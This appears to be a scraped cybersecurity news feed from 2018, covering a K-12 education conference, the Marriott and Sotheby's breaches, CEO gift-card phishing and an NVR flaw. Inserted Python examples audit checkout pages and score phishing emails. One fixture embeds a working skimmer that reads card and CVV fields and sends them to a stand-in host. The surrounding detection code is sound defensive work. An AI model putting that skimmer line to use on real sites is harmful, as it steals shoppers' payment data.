Info Security


#NICEK12: Hands-On Resources from the Field

Tue, 12/04/2018 - 03:09

In addition to the five conference tracks at the 2018 NICE K12 Cybersecurity Education Conference going on in San Antonio, Texas, attendees were also able to engage in hands-on learning at drop-in sessions during which exhibitors were able to share resources they have used with some success to help advance cybersecurity in the K-12 sector. 

In one session, two teachers from North Carolina showcased the progress they have made in educating kids about cybersecurity.

In their presentation, “Bytes for Breakfast - A Small Rural High School’s Answer to Getting Students Excited About Coding and Cybersecurity,” teachers Renee Himmelspach and Amanda Campbell from South Stokes High School in North Carolina said that the name of their club came from the fact that the group meets before school.

The Bytes for Breakfast club, now in its first year, meets twice a month before the school day begins so that students can explore coding on the two Raspberry Pis and the iPad Pros donated to the group. The group also meets once a month after school for a longer session.

Showing as much enthusiasm as Himmelspach and Campbell, Robert Black, CEO and founder of Start Engineering, showcased the Cybersecurity Career Guide, a book designed for classrooms, camps and other outreach programs to introduce students to the many career paths available in cybersecurity.

In partnership with Palo Alto Networks, Start Engineering produced the 52-page, magazine-style book, which describes different job types along with the education each requires and the salary a candidate would likely earn in each position.

Designed for middle and high school students, the publication was released in April and will be updated every two years as job descriptions and technology evolve.

#NICEK12: Creating a Paradigm Shift in Cyber

Tue, 12/04/2018 - 02:44

At the 2018 NICE K12 Cybersecurity Education Conference in San Antonio, Texas, industry leaders spoke about promoting cyber awareness by educating kids so that they can in turn educate their parents and move the needle on protecting privacy in our interconnected world. 

In his presentation, “The Thief Is One Hundred Years Ahead of the Locksmith,” Ronald Malden, chief learning officer, Regal Business Opportunities Inc., offered a strategic plan for the national initiative of accelerating cybersecurity learning and skills development in a diverse user community.

Malden's premise is that because criminals stay a step ahead of whatever lock defenders invent, educating people is far more useful than inventing yet another defense.

“In this day and age, we have to educate the children if we are ever to achieve cyber awareness across a diverse workforce environment. In today’s current cyber environment, when I focus on general education, I’m actually focused on what we need to accomplish in K-12 in order to educate the entire society,” Malden said.  

So how do we become more cyber aware? According to Malden, approaching cyber in general education from a K-12 perspective includes both technical and nontechnical content because computing communication is occurring when you wake up and does not stop when you sleep. “We need to educate cyber knowledge across the life spectrum as well as teach it in small doses in diverse general education, which includes teaching cyber in physics, law and philosophy.”

To succeed in that endeavor, Malden said, the message has to reach its audience through a trusted messenger, and educators need an approach that tells them how to teach the population at large.

“Students should be graduating cyber certified so that they understand penetration detection, intrusion detection and what it means to be cyber aware so they are not the victim,” Malden said. “A cyber-hacker is looking for money. If you are no longer the low-hanging fruit, then you have less of a loss.”

The industry needs a paradigm shift that moves education from defensive to offensive, Malden said. To achieve it, the education of every individual must be addressed, and involvement in cyber education increased by integrating cyber domain concepts into the ethos or curriculum of K-12 organizations.

#NICEK12: Increasing Cyber Career Awareness

Mon, 12/03/2018 - 16:13

With a packed schedule of over 100 sessions across five tracks, the 2018 NICE K12 Cybersecurity Education Conference endeavored to deliver a wide array of strategies and tactics to enable educators and public schools to enhance their understanding of how to engage students in cybersecurity. 

The five tracks included increasing cybersecurity career awareness, infusing cybersecurity across the educational portfolio, integrating innovative cybersecurity educational approaches, designing cybersecurity academic and career pathways and promoting cyber awareness. 

In talking about innovative ways to introduce students to career paths they may not even know exist, Benjamin Galynker, director of content, Hats & Ladders, spoke about how to go “From Overwhelmed or Slacking to Ethical Hacking.” 

It’s no mystery why the skills gap continues to grow despite industry demand. “The problem we face is understanding how to raise young people’s awareness of career options that their parents might not know about,” Galynker said. 

When it comes to cybersecurity, most people think it’s not for them or more likely that it couldn’t be for them, which is why awareness matters. Society works best when young people pursue careers that they are confident will allow them to succeed in their futures, Galynker said.

There are some missing links, though, between awareness and "what should I do next," which is where educators and schools play a key role. Hats & Ladders is one way to make educators aware of the industry’s efforts to create platforms that will help engage students. 

The organization is intended to connect educators and mentors, industry partners, colleges and community programs to help students begin to understand the career opportunities available to them through online learning, as well as helping educators incorporate into their curriculum more hands-on DIY activities, field trips and observations, internships, apprenticeships and scholarships.

Part of the effort is to help educators understand the root sources. To that end, Hats & Ladders developed a free platform to fill in those missing links, taking students from curiosity to interest, engagement and motivation. 

Often, youth will rely on their own knowledge without realizing what they don’t know. They think they know what they want to do, but they don’t have a second or third choice, nor do they understand the career assets they might have and how they can use those assets to pivot into potential cybersecurity careers. 

“Youth don’t have a lot of career development counseling,” Galynker said. “[For] every 437 high school students, there is only one high school counselor, making parents the single largest influence on young people’s careers.”

#NICEK12: Young Women Are Making Cyber Waves

Mon, 12/03/2018 - 15:19

In a pre-conference workshop, 2018 NICE K12 Cybersecurity Education Conference sponsor IBM offered #CyberDay4Girls, in which girls in 6th–9th grade met at Sam Houston High School to learn about protecting their online identity and the internet of things, and to meet female role models studying and working in cybersecurity.

Part of the goal is shifting the perspective and teaching girls to be brave, not perfect, said Kyla Guru, a high school junior from Illinois and founder of Bits N’ Bytes Cybersecurity Education (BNBCE), in her keynote address.

Guru first thanked the audience for involving her in the dialogue about what she called our "state of cyber-insecurity." “What is the current state?” Guru asked. “An expected 1.8 million cybersecurity jobs that will be unfilled by 2022. In 2017, the education sector alone accounted for 13% of breaches, which amounts to the compromise of around 32 million records. In addition, we are expected to lose $8 million by 2022.”

Her goal is to make sure that we all understand the monetary loss that will happen because of cyber-attacks so that rather than lose that money, we can try to save that money for future generations to invest in saving the future.

“We are making waves,” Guru said, “and that calls for some sort of applause. We need some recognition for the progress we have made so that we can get excited about the work that still needs to be done.”

In explaining her vision, Guru described why she created BNBCE. The idea came to her while thinking about the student science lab safety contract that she and her fellow students had to sign every year. After seven years, she had the contract memorized.

“I know that after you get chemicals in your eyes, you have to wash your eyes out for 20 minutes at the wash station. Those have been made second nature because of the emphasis that teachers have put on it. So I started to think, ‘What if we could make something like this for cybersecurity?’ because that is the power of education.”

Recognizing that the internet is the new playground for young people, Guru said she realized that security was not second nature to her peers. “I set out to create a five-minute animated video for my former elementary school, but after I made the video, I realized that the problem couldn’t be solved by one video sent to one school down the street from my house. This mission was so much bigger than this one school.”

From there, Guru created the national nonprofit, which started with youth. Why? “It is incredibly impressive and slightly concerning how much we use technology. Also, young people are going to build technology. Shouldn’t they know how to deal with and manage the situations that will come along with that technology?” she said.

In the past 24 months, the nonprofit has grown to include 26 partners. BNBCE has written 40 articles on its blog and hosted more than 35 workshops, amounting to an outreach that has connected with 15,722 students.

#NICEK12: San Antonio Aims to Become Cyber City, USA

Mon, 12/03/2018 - 14:45

The 2018 NICE K12 Cybersecurity Education Conference kicked off this morning in San Antonio, Texas, with opening remarks from Ron Nirenberg, mayor of San Antonio. 

The National Initiative for Cybersecurity Education (NICE) is part of the National Institute of Standards and Technology (NIST) and aims to deliver quality professional development focused on strategies that will inspire awareness about cybersecurity preparedness for young people while also inspiring them to explore the myriad careers within the industry. 

“I can’t think of a more important educational initiative,” said Nirenberg. “The city’s cyber roots go almost as far back as our military history. Today San Antonio is second only to Washington, D.C., in terms of cybersecurity assets.”

Over the past few years, the US Cyber Command has brought more than 1,000 new jobs to San Antonio, resulting in hundreds of millions of dollars of economic impact. In addition to the robust cybersecurity industry, the city boasts over a dozen colleges and universities with cybersecurity programs.

Advancements continue to be made. According to the mayor, in the last two months, San Antonio has had two very exciting announcements related to work in cyber. First, the University of Texas–San Antonio (UTSA) announced a significant investment in its AI and data science national security collaboration center. With a $33 million investment, UTSA will be expanding its downtown campus by developing a National Security Collaboration Center (NSCC) and a School of Data Science.

Second, Texas A&M was invited to join Facebook’s cybersecurity university program. Together, Facebook and Texas A&M–San Antonio have opened a $63 million science and technology building. 

The collective investments are an indication that “San Antonio leadership gets it. Cybersecurity is an extraordinary priority for us,” Nirenberg said. 

“We know our community needs to continue to fund innovation and continue to invest in our future workforce, as we continue to build what we call Cyber City, USA. The work you are doing is critical for all.” 

Reported Cybercrime Jumps 14% in England

Mon, 12/03/2018 - 11:10

The number of cybercrime incidents reported to police forces in England rose by 14% between the last two financial years, according to a new report.

Think tank Parliament Street filed Freedom of Information (FOI) requests with the country’s police forces, asking for a breakdown of Computer Misuse Act crimes which involve hacking, smart devices and/or connected devices.

Although only 14 of a possible 39 forces returned a full set of answers, the findings can be read as illustrative of broader trends.

The total number of cybercrimes over the two-year period was 2,547, rising from 1,193 in 2016/17 to 1,354 in 2017/18.

Of those appraised, Cleveland Police reported the most cases in 2017/18 with 356, followed by West Midlands (329) and Nottinghamshire Police (246).

The latter two also reported the biggest increases from the previous year, of 19% and 21% respectively.

However, interestingly, London’s Metropolitan Police reported a drop in cybercrime cases, from just 77 in 2016/17 to 49 in 2017/18.

Anecdotally, unauthorized access to email and social media accounts to obtain and distribute personal photos figured strongly in cases. On the corporate side, the report also highlights ransomware as a common factor.

“It’s clear that the tidal wave of cybercrime is draining the resources of police forces as well as businesses. Tackling this problem requires a concerted effort to recruit staff equipped with the latest cyber skills as well as extending education and training opportunities to existing employees,” argued Sheila Flavell, chair of the Institute of Coding.

“As part of this effort, it’s vital that industry works more closely with academic institutions, to develop specialist flexible courses, so that skills within workforces increase dramatically.”  

The report itself calls for mandatory cyber training for all new police recruits in line with nationally recognized standards; more help from tech and social media companies to train officers; and an increase in STEM-qualified officers.

“As well as working closely with universities and training colleges, industry organizations should also offer placement years and consultancy to ensure that police forces are fully equipped to deal with this threat,” it advised.

The tech sector is stepping up to a certain extent: last week Cisco announced it would be providing free access to its Cisco Networking Academy to help train 120,000 officers.

Kaspersky Lab's US Ban Appeal Thrown Out

Mon, 12/03/2018 - 10:22

Eugene Kaspersky has vowed that his firm will continue its mission to protect global organizations after a US court threw out its appeal to have a ban on federal use of its products overturned.

On Friday, the US Court of Appeals for the District of Columbia Circuit upheld a district court ruling that the September 2017 Binding Operational Directive (BOD 17-01) and the congressional National Defense Authorization Act (NDAA) do not violate the constitution.

Kaspersky Lab had argued in court that they violate the Fifth Amendment by interfering with due process.

Russian intelligence is said to have used Kaspersky Lab products to spy on top secret US government programs, but the firm has always denied any collusion.

Kaspersky himself was sanguine about the outcome.

“The DC Circuit Court’s decision is disappointing, but the events of the past year that culminated in this decision were almost expected, and not just by our company, but by the cybersecurity industry in general,” he wrote in a blog post.

“We’re sure that the issues involved in our litigation go far beyond technical aspects of US constitutional law; they include real-world problems concerning everyone: a progression of protectionism and balkanization in a world of understated cyber-rivalry and highly sophisticated international cyber threats.”

The Moscow-headquartered firm had launched a Global Transparency Initiative in an attempt to restore trust with customers. This includes three new Transparency Centers in the US, APAC and Europe, where trusted partners can access reviews of the company’s code, software updates, threat detection rules and more.

The first such center was recently opened in Switzerland.

“We’re addressing customers’ concerns by ensuring that our own operations are transparent and trustworthy with a respected firm auditing our engineering practices and secure development processes,” explained Kaspersky.

“We constantly aim to be a part of the solution as the cyber threat landscape evolves. Regardless of whether we decide to pursue further legal action in response to today’s decision from the DC Circuit Court, we’ll remain committed to providing the best cybersecurity solutions for our customers globally and saving the world from cyber threats.”

Sotheby’s Site Infected with Magecart for Over a Year

Mon, 12/03/2018 - 09:40

Sotheby’s has become the latest big-name brand to have its website infected with digital skimming code.

The venerable British auction house revealed on Friday that its New York-based e-commerce marketplace Sotheby’s Home, known formerly as Viyet, was affected.

According to the statement, the firm discovered and “promptly removed” the malicious code, inserted by a third party, on October 10. However, it had been on the site since “at least” March 2017, meaning countless customers could have been affected over the 19-month period.

In fact, it could be even longer. Sotheby’s admitted: “we cannot be certain as to when the website was first victimized by this attack.”

“The code was designed to target the data you entered into the payment information form on the Sotheby’s Home website,” it added. “This information would include your name, address, email address and payment card number, expiration date, and CVV code.”

The incident would seem to indicate that the group behind this scheme infected the site directly, in a similar way to skimming attacks on British Airways and Newegg sites, rather than via a third-party supplier, as happened to Ticketmaster.
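As an added illustration of the check a site operator would want after an incident like this (example code, not Sotheby's, RiskIQ's or any Magecart group's code): the script below parses a checkout page, compares every inline script against a baseline of known-good SHA-256 hashes, flags unbaselined scripts that read payment-form fields or send data off the page, and flags external scripts loaded from hosts outside an allow-list. The two HTML pages, the allow-list and the baseline are constructed for the example; a real deployment would build the baseline from the release artifact and run the comparison against the live page on a schedule, since code of this kind sat unnoticed here for 19 months.

```python
"""Baseline check for injected checkout-page scripts (added example, not Sotheby's
or RiskIQ's code). The pages, allow-list and baseline below are constructed."""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allow-list of hosts the shop is expected to load scripts from.
ALLOWED_SCRIPT_HOSTS = {"www.example-shop.test", "cdn.example-shop.test"}
# Field names a skimmer typically reads from a payment form.
PAYMENT_FIELDS = re.compile(r"card[_-]?number|ccnum|cvv|cvc|expir", re.I)
# Ways a script commonly ships captured data to a collection server.
EXFIL = re.compile(r"XMLHttpRequest|fetch\(|sendBeacon|new Image\(|\.src\s*=", re.I)


class _ScriptCollector(HTMLParser):
    """Collects inline script bodies and external script src attributes."""

    def __init__(self):
        super().__init__()
        self.inline, self.external = [], []
        self._in_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def sha256_hex(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def audit_page(html, baseline_hashes, page_host):
    """Return findings for inline scripts missing from the baseline and for
    external scripts served from hosts outside the allow-list."""
    collector = _ScriptCollector()
    collector.feed(html)
    findings = []
    for code in collector.inline:
        digest = sha256_hex(code)
        if digest in baseline_hashes:
            continue
        reasons = ["inline script not in baseline"]
        if PAYMENT_FIELDS.search(code):
            reasons.append("reads payment fields")
        if EXFIL.search(code):
            reasons.append("sends data out")
        findings.append({"kind": "inline", "sha256": digest, "reasons": reasons})
    for src in collector.external:
        host = urlparse(src).netloc or page_host  # relative src loads from the page's own host
        if host not in ALLOWED_SCRIPT_HOSTS:
            findings.append({"kind": "external", "src": src,
                             "reasons": [f"script host {host} not on allow-list"]})
    return findings


# Constructed known-good inline script and the baseline built from it.
KNOWN_GOOD = 'window.shopConfig = {"currency": "USD"};'
BASELINE = {sha256_hex(KNOWN_GOOD)}

# Constructed clean page: the baselined inline script plus a same-host external script.
CLEAN_PAGE = ("<html><head><script>" + KNOWN_GOOD + "</script>"
              '<script src="/static/checkout.js"></script></head>'
              '<body><form id="checkout"><input id="card_number"><input id="cvv"></form></body></html>')

# Constructed compromised page: the same content plus an injected skimmer that hooks the
# form submit, reads the card fields and sends them out via an image request, and a
# script pulled from an unapproved host.
SKIMMER = (
    "document.getElementById('checkout').addEventListener('submit', function () {"
    " var d = {n: document.getElementById('card_number').value,"
    " c: document.getElementById('cvv').value};"
    " var i = new Image(); i.src = 'https://stats-collector.test/c?' + btoa(JSON.stringify(d)); });"
)
COMPROMISED_PAGE = CLEAN_PAGE.replace(
    "</head>",
    "<script>" + SKIMMER + "</script>"
    '<script src="https://stats-collector.test/jquery.min.js"></script></head>')

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("compromised", COMPROMISED_PAGE)):
        print(name, audit_page(page, BASELINE, "www.example-shop.test"))
```

The hash comparison is what catches a 19-month-old injection regardless of how the skimmer is obfuscated; the field and exfiltration patterns only add context to the finding, and a skimmer loaded as an external file is caught by the host allow-list rather than by content inspection.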

Given that it has taken nearly two months for the auctioneer to come clean about the incident, it could be in trouble with European GDPR regulators if any EU citizens’ data has been swiped — although that’s unlikely given the site is designed for only US customers.

However, it could be too late for many of those affected. RiskIQ claimed recently that British Airways and Newegg customers’ credit card details went up for sale on the dark web little more than a week after they were skimmed from the respective sites.

Several groups are thought to be actively using the code around the world, with recent revelations that one is even attempting to sabotage the activities of another in order to maximize its profits.

Marriott Starwood Hack: Data of 500 Million Hotel Guests 'Compromised'

Fri, 11/30/2018 - 12:42

Hotel chain Marriott has confirmed widespread reports of a significant data breach with the sensitive details of 500 million customers possibly compromised.

In an online statement, the company said: “On September 8, 2018, Marriott received an alert from an internal security tool regarding an attempt to access the Starwood guest reservation database. Marriott quickly engaged leading security experts to help determine what occurred.

“Marriott learned during the investigation that there had been unauthorized access to the Starwood network since 2014. Marriott recently discovered that an unauthorized party had copied and encrypted information, and took steps towards removing it. On November 19, 2018, Marriott was able to decrypt the information and determined that the contents were from the Starwood guest reservation database.

“Marriott has not finished identifying duplicate information in the database, but believes it contains information on up to approximately 500 million guests who made a reservation at a Starwood property.”

The statement explained that the information copied from the Starwood guest reservation database over time includes information about guests who made a reservation at a Starwood property, including names, mailing addresses, phone numbers, email addresses, passport numbers, Starwood Preferred Guest (“SPG”) account information, dates of birth, gender, arrival and departure information, reservation dates, and communication preferences.

“For some, the information also includes payment card numbers and payment card expiration dates, but the payment card numbers were encrypted using Advanced Encryption Standard encryption (AES-128). There are two components needed to decrypt the payment card numbers, and at this point, Marriott has not been able to rule out the possibility that both were taken.”

“Marriott deeply regrets this incident happened,” the company added. “From the start, we moved quickly to contain the incident and conduct a thorough investigation with the assistance of leading security experts. Marriott is working hard to ensure our guests have answers to questions about their personal information with a dedicated website and call center. We are supporting the efforts of law enforcement and working with leading security experts to improve. Marriott is also devoting the resources necessary to phase out Starwood systems and accelerate the ongoing security enhancements to our network.” 

Javvad Malik, security advocate at AlienVault, said: “This seems like a particularly big breach, not just because of the number of records taken, but also the details that were contained within. It appears as if detection capabilities were not adequate, taking several weeks to notice the breach and extraction of records. It is good that the credit card database was encrypted, but if, according to the company, the attackers were able to take the decryption key, then it was of no use. The digital equivalent of leaving the key for the front door under the mat.”

Jake Moore, cybersecurity expert at ESET UK, advised victims of the breach to keep a watchful eye on where their data may end up.

“Be alert to the idea that hackers may well target you for the final few pieces of information that they couldn’t get hold of, perhaps in follow-up phishing emails, in an attempt to take over your identity in the coming days – if they haven’t done so already in the past,” he said. “This is particularly something to be mindful of if you visited one of the affected hotels on business and may not necessarily remember which hotels you visited.”

Undervalued Assets Put Business at Risk

Fri, 11/30/2018 - 12:06

New research from the Ponemon Institute, in partnership with DocAuthority, found that IT security departments are underestimating the value of business documents by hundreds of thousands of dollars.

In a newly published report, the Ponemon Institute found that despite being responsible for their management and protection, IT security departments are undervaluing a range of business assets, from research and development to financial reports. In contrast, they are over-prioritizing less-sensitive data related to personally identifiable information (PII).

The study found that IT security departments predicted that it would cost a business $306,545 to reconstruct an R&D document, while the R&D department estimated the reconstruction cost at $704,619, more than double what the IT security department estimated.  

Additionally, IT security departments estimated that the impact of a financial report being leaked at $131,570, compared to the $303,182 that the finance department believes it would incur from a security incident.

“The recent Ponemon report about data value illustrates the importance of understanding the relationships between organizations and third parties and the value of the information being shared. Only by doing so can organizations fully understand risk and properly prioritize effort and control,” said Matan Or-El, CEO of Panorays.

When IT security departments undervalue these assets, they also underestimate the safeguards that should be put in place in order to protect the business assets, thereby increasing the security risk.

The report also found that when organizations underinvest in protecting the more critical data, the result is money wasted on protecting meaningless data or the mishandling of access rights for employees.

"Typically, the security and protection of business data is considered to be the responsibility of the IT security department. Yet it’s clear from this research that IT security does not have the vitally important context required to understand the true value of that data and, in turn, create an effective strategy for defending it,” said Dr. Larry Ponemon, chairman and founder of the Ponemon Institute in a press release. “Rather than being relegated to IT, data and its protection should be the concern of not only management level, but the business as a whole.”

Request for Gift Card Purchases in Phishing Emails

Fri, 11/30/2018 - 11:44

Attackers are deep in the spirit of exploiting the holidays for financial gain, so it is unsurprising that another spear-phishing variant has emerged: attackers pose as CEOs to trick office managers, executive assistants and receptionists into buying and sending them gift cards, according to email security researchers at Barracuda Networks.

Since early October, the researchers have reportedly seen an uptick in these attacks. Unlike phishing campaigns that carry attachments, these emails contain no malicious links or files. They are also typically sent from free email services whose domains carry a high reputation, which helps them get through.

As a result, traditional email filters often do not recognize them as threats. The attackers also capitalize on the urgency of the holidays and pose the request as a company surprise to discourage the victim from confirming its legitimacy.

Using the social engineering tactics of CEO impersonation, requests for secrecy, researching relevant details and implied urgency, the attackers are specifically and intentionally exploiting people’s good cheer during the holidays.

In one example, an email message signed “from my Sprint Wireless 4G LTE Smartphone” asks the recipient to pick up gift cards to be distributed to staff but requests that she keep the transaction confidential.

“In all of these attacks, the emails were sent from free personal email services with a relatively high reputation. In addition, they do not contain any type of malicious payload, such as links or attachments,” wrote Barracuda’s Asaf Cidon, VP of content security services.

“Instead the emails rely solely on social engineering and impersonation to trick their targets. These types of attacks are very hard for traditional email filters to pick up because they are targeted, have a high reputation, and do not contain any obvious malicious signals.”
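The signals Cidon lists (a free-mail sender with a good reputation, an impersonated executive, no links or attachments, secrecy and urgency) can be scored directly, which is what the added example below does; it is not Barracuda's code. It assumes a constructed directory of executive names and their corporate addresses, a constructed free-mail domain list, a threshold chosen for the three constructed messages at the bottom, and adds a Reply-To mismatch check that the article does not mention. Because the score is built from headers and wording rather than from links or attachments, the gift-card message is flagged even though it carries no payload, while a vendor promotion that also mentions gift cards stays below the threshold.

```python
"""Heuristic scorer for gift-card BEC emails (added example, not Barracuda's code).
The executive directory, free-mail list and sample messages are constructed."""
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed directory: display names attackers spoof, mapped to the real corporate address.
EXECUTIVES = {"jane doe": "jane.doe@example.com"}
# Constructed list; a production filter would use a maintained free-mail list.
FREEMAIL_DOMAINS = {"gmail.com", "yahoo.com", "outlook.com", "hotmail.com", "aol.com"}

# Weighted content signals; subject and body are searched together.
SIGNALS = [
    ("gift card request", 2, re.compile(r"\bgift\s*cards?\b", re.I)),
    ("secrecy", 1, re.compile(r"\b(confidential|surprise|between us|don'?t tell)\b", re.I)),
    ("urgency", 1, re.compile(r"\b(asap|urgent|right away|immediately|today|in a meeting)\b", re.I)),
    ("mobile signature", 1, re.compile(r"sent from my .{0,40}(phone|android)", re.I | re.S)),
]
THRESHOLD = 5  # assumption: tuned for the constructed samples below


def _body_text(msg):
    """Plain-text body, joining the text/plain parts of a multipart message."""
    if msg.is_multipart():
        parts = [p.get_payload(decode=True) or b""
                 for p in msg.walk() if p.get_content_type() == "text/plain"]
        return "\n".join(p.decode("utf-8", "replace") for p in parts)
    return (msg.get_payload(decode=True) or b"").decode("utf-8", "replace")


def score_message(raw):
    """Return score, verdict and reasons for one RFC 822 message string."""
    msg = message_from_string(raw)
    display, addr = parseaddr(msg.get("From", ""))
    addr = addr.lower()
    domain = addr.rsplit("@", 1)[-1] if "@" in addr else ""
    text = msg.get("Subject", "") + "\n" + _body_text(msg)
    score, reasons = 0, []

    # Display-name impersonation: a known executive's name on a different address.
    name = re.sub(r"[^a-z ]", "", display.lower()).strip()
    expected = EXECUTIVES.get(name)
    if expected and addr != expected:
        score += 3
        reasons.append(f"display name '{display}' used from {addr} instead of {expected}")
    if domain in FREEMAIL_DOMAINS:
        score += 2
        reasons.append(f"sender on free-mail domain {domain}")
    _, reply_to = parseaddr(msg.get("Reply-To", ""))
    if reply_to and reply_to.lower() != addr:
        score += 1
        reasons.append("Reply-To differs from From")
    for label, weight, pattern in SIGNALS:
        if pattern.search(text):
            score += weight
            reasons.append(label)
    # Approximation: a URL in the text or any multipart structure counts as a payload.
    has_payload = bool(re.search(r"https?://", text)) or msg.is_multipart()
    return {"score": score, "flagged": score >= THRESHOLD,
            "has_links_or_attachments": has_payload, "reasons": reasons}


# Constructed messages. ATTACK mirrors the pattern in the article: spoofed CEO name,
# free-mail sender, gift cards for staff, secrecy, urgency, mobile signature, no links.
ATTACK = """From: "Jane Doe" <janedoe.ceo@gmail.com>
To: office.manager@example.com
Subject: Quick favor

Are you at your desk? I need you to pick up five Amazon gift cards for the staff today.
It is a surprise, so please keep it confidential. Scratch off the back and send me the codes.
I am in a meeting and cannot take calls.

Sent from my Sprint Wireless 4G LTE Smartphone
"""

LEGIT = """From: "Jane Doe" <jane.doe@example.com>
To: office.manager@example.com
Subject: Q4 budget

Attached is the Q4 budget draft. Let's review it on Thursday.
"""

PROMO = """From: "Shop Deals" <promo@shop.example.net>
To: office.manager@example.com
Subject: Holiday gift cards on sale

Buy gift cards today and save 10% at https://shop.example.net/gift
"""

if __name__ == "__main__":
    for name, raw in (("attack", ATTACK), ("legit", LEGIT), ("promo", PROMO)):
        print(name, score_message(raw))
```

The impersonation check is the strongest single signal because it does not depend on wording: a legitimate message from the executive's real address scores nothing for it, while the same display name on a free-mail address scores before any keyword is read.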

Cisco Offers Cyber Training to UK Police Officers

Fri, 11/30/2018 - 11:34

Cisco is trumpeting a new initiative designed to improve the cybersecurity skills of UK police officers.

The US tech giant claimed its partnership initiative will see 120,000 officers in England, Scotland, Wales and Northern Ireland gain access to the Cisco Networking Academy.

This will provide training for individuals at all levels. The learning platform runs both in-person and online courses including: Introduction to Cybersecurity, Cybersecurity Essentials, CCNA [Cisco Certified Network Associate] Cybersecurity Operations and CCNA Security.

Andy Beet, futures lead at the Data Communications Group of the National Police Chiefs’ Council, welcomed the news.

“By joining the program, forces can access training designed to raise awareness and increase their understanding of cybercrime and cyber-threats, while also gaining insights into the procedures used to defend networks,” he explained.

“It’s important for all police officers to understand cybersecurity as fully as possible; by doing so they can develop their knowledge in this increasingly important area, improving security in both their professional and personal lives."

The police are certainly in need of extra resources to improve skills levels, but getting the funding is a struggle at a time of continued government-imposed austerity.

Two years ago, then-home secretary Theresa May announced new plans to draft in volunteers to help regular officers on cybercrime cases without the need to become special constables first.

Sixteen forces that responded to a recent FOI request from think tank Parliament Street spent an average of just £82,500 each on training over the past three years. However, a large proportion of this was accounted for by just a handful of forces, including North Wales Police (£375,000), West Mercia & Warwickshire (£126,000), and Lincolnshire (£120,000).

Cisco claims its Networking Academy has helped to train over eight million people globally since its launch 20 years ago.

Infosecurity has asked Cisco for clarification on the financial details of the deal and the courses that police will be able to access.

Categories: Cyber Risk News

NVRmini2 Network Video Recorder Vulnerabilities

Fri, 11/30/2018 - 11:22

The vulnerability research team at Digital Defense announced that it has discovered a zero-day vulnerability in the Nuuo NVRmini 2 network video recorder (NVR) firmware, software used by hundreds of thousands of surveillance cameras worldwide.

Reportedly caused by “improper sanitization of user-supplied inputs and lack of length checks on data used in unsafe string operations on local stack variables,” the flaw ("lite_mv" Remote Stack Overflow in NUUO NVRmini2 3.9.1) would allow an attacker to gain remote access as an unauthenticated user. The attacker could then execute arbitrary code with root privileges.

According to the researchers, NVRmini2 firmware version 3.9.1 and prior is vulnerable to an unauthenticated remote buffer overflow that could potentially be leveraged by an attacker. Exploiting the vulnerability could allow an attacker to modify the camera feeds to the NVR and change its configuration or recordings.

A patch has since been issued, and Digital Defense commended NUUO for its swift response in providing fixes to the security issue.

In related news, Tenable researcher David Wells recently disclosed a vulnerability (CVE-2018-15715) in Zoom applications for Windows and macOS that could also be exploited by an unauthorized user to invoke functions normally reserved for Zoom servers.

The two disclosed vulnerabilities in NVRs are indicative of the potential security problems in these internet of things (IoT) devices. According to Craig Young, computer security researcher for Tripwire’s vulnerability and exposure research team (VERT), NVRs are one of the earliest types of connected devices to be successful in the market.

Because they were so early to market, many of these systems haven’t evolved, making them vulnerable to the same types of basic flaws, Young said. “Anyone using the Nuuo NVRmini 2 needs to prioritize patch deployment for affected systems, regardless of whether the device is directly exposed to the Internet.

“This can be exploited with an unauthenticated HTTP request, and attackers can craft malicious web pages which search local networks for affected systems to compromise. This type of attack is known as cross-site request forgery and can come from malicious emails, advertisements, and even comment spam.”

Categories: Cyber Risk News

GCHQ Reveals Why Some Flaws Are Kept Secret

Fri, 11/30/2018 - 10:38

GCHQ has revealed for the first time how it researches vulnerabilities, claiming sometimes not to inform the vendor if a specific flaw could be used to its advantage.

The intelligence agency’s “Equities Process” involves a binary decision: disclose so a patch can be issued to improve the overall security of businesses and consumers, or hang on to it for reasons of national security.

“We say our default position is to disclose the problem and there has to be a very good reason not to — either an overriding intelligence case or the fact that disclosing could reduce the security of people who use the product — and we really do mean it,” explained Ian Levy, technical director of GCHQ’s National Cyber Security Centre (NCSC).

“Some people will say that we don’t need this process and that we should just disclose everything. In my opinion, that’s naïve — and I don’t think it’s got much to do with the NCSC being part of GCHQ and the wider UK intelligence community. If we were separate, the rest of the community would still do vulnerability research and we would be much less likely to see those vulnerabilities and have a voice in how they’re handled, so the UK would likely be at greater security risk.”

The NCSC was at pains to point out the checks and balances that exist in the process to ensure that non-disclosure is only a decision taken in exceptional circumstances. This includes review by an Equities Technical Panel, an Equity Board, and finally, NCSC CEO, Ciaran Martin.

Questions asked by these panels include: how likely it is that the vulnerability could be discovered and exploited by someone else; what sectors would be exposed if it is left unpatched; and what the potential damage could be if the flaw is exploited.

“This process is complex and sometimes quite nuanced, relying on expert judgement around very detailed technical issues,” said Levy. “That’s true across the range of our work, not just this process, and I make no apology for it — we’re proudly expert.”

The decision-making process is said to be similar to that of the US intelligence agencies.

Jake Moore, cybersecurity expert at ESET UK, warned that the impact of non-disclosure could be severe.

“Just look at WannaCry where [NSA exploit] EternalBlue was kept quiet prior to its fix,” he argued.

“There are inevitably many weaknesses in computer software and operating systems that are yet to be patched, some of which will be left unpatched for a considerable amount of time. Not highlighting this to the vulnerable companies at risk could give cyber-criminals many opportunities to attack.”

Russell Haworth, CEO of Nominet, argued that businesses should be more self-reliant.

“Retaining some knowledge can help GCHQ protect the nation in the future. This story underlines that businesses should be taking their own steps to protect themselves from potential threats, not relying on others,” he added.

“Responsibility for cybersecurity begins at home. There are lots of technologies that can help identify if your network has been compromised, and take action.”

Categories: Cyber Risk News

FCA: Cyber Resilience a Top Concern for Financial Firms

Fri, 11/30/2018 - 09:18

The majority of financial firms rank cyber-resilience as their top concern, with people, visibility and third-party risk key challenges, according to the Financial Conduct Authority (FCA).

The UK regulator’s latest report, Cyber and Technology Resilience: Themes from cross-sector survey 2017 – 2018, is based on interviews with nearly 300 firms over the past 24 months.

The number of technology outages reported to the FCA over the past year increased 138%, with cyber-attacks accounting for 18% of operational incidents.

